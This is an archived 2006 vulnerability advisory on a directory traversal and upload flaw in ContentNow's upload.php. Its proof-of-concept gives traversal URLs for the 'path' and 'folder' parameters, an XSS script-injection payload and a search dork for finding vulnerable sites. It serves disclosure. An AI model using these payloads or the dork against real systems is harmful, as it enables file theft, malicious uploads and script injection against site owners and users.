ContentNow Directory Traversal(upload.php)

2006-11-14T00:00:00
ID SECURITYVULNS:DOC:15045
Type securityvulns
Reporter Securityvulns
Modified 2006-11-14T00:00:00

Description

ContentNow Directory Traversal(upload.php)

-vulnerability By: Timq -http://securitydb.org -Team Root-Shell -Email:timq[at]hushmail.com


It appears that it is possible to view any files on a system via 'upload.php'. Proper filtering not in affectfor the 'path' and 'folder' variables. You can also upload malicious files to where you have access through 'upload.php'.


~PoC

http://site.com/cn/upload.php?path=/ http://site.com/cn/upload.php?folder=/ XSS: http://site.com/cn/upload.php?path="><script>alert("xss")</script> D0rk: intitle:intitle:ContentNow


shouts:Warpboy,Zeusixsixsix,Stansar,Preddy,OG,PunkerX,Ethernet,str0ke,Gamma,Maggot everyone else


milw0rm.com [2006-11-14]